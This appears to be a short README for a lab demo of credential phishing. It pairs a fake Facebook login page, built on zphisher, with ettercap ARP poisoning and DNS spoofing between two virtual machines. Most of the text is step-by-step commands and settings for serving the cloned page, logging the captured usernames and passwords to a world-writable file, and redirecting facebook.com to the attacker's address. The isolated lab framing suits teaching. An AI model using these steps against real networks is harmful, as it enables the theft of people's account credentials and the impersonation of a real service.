A Phishing website (fack Facebook login page) and DNS spoofing demo
- Virtual box (NAT network is required)
- Host VM x 2 (or more)
- Attacker and victim both connect to the NAT network
- A fack Facebook login page
- OS: Ubuntu 22.04 (Kali and others that can use ettercap are accepted)
- NAT network (ip address: 10.0.2.4)
- OS: Windows XP
- NAT network (ip address: 10.0.2.7)
- two VMs can connect to each other (attacker pings victim)
- the source code of the site is based on zphisher
cd site
cp * /var/www/html/
cd /var/www/html/
mkdir data
cd data
touch usernames.txt
cd ..
chmod -R 777 .
cd ~
service apache2 start
tail -f /var/www/html/data/usernames.txt
- the attacker can test by accessing 127.0.0.1 on the browser
- the victim can also connect to a real Facebook login site (access 10.0.2.4 on the browser)
vim /etc/ettercap/etter.conf
- modify ec_uid, ec_gid = 0
- uncomment linux setting
vim /etc/ettercap/etter.dns
- add facebook.com into target list
ettercap -G
- stop unified sniffing
- scan the hosts
- add the victims' ip address to target 1
- start MITM attacks: ARP poisoning
- enable dns_spoof plugin
- start unified sniffing
- open cmd
nslookup facebook.com
ping facebook.com
- the ip address of facebook.com becomes 10.0.2.4
- open the browser in private mode and access facebook.com
- login!
- the account and password are shown on ettercap and usernames.txt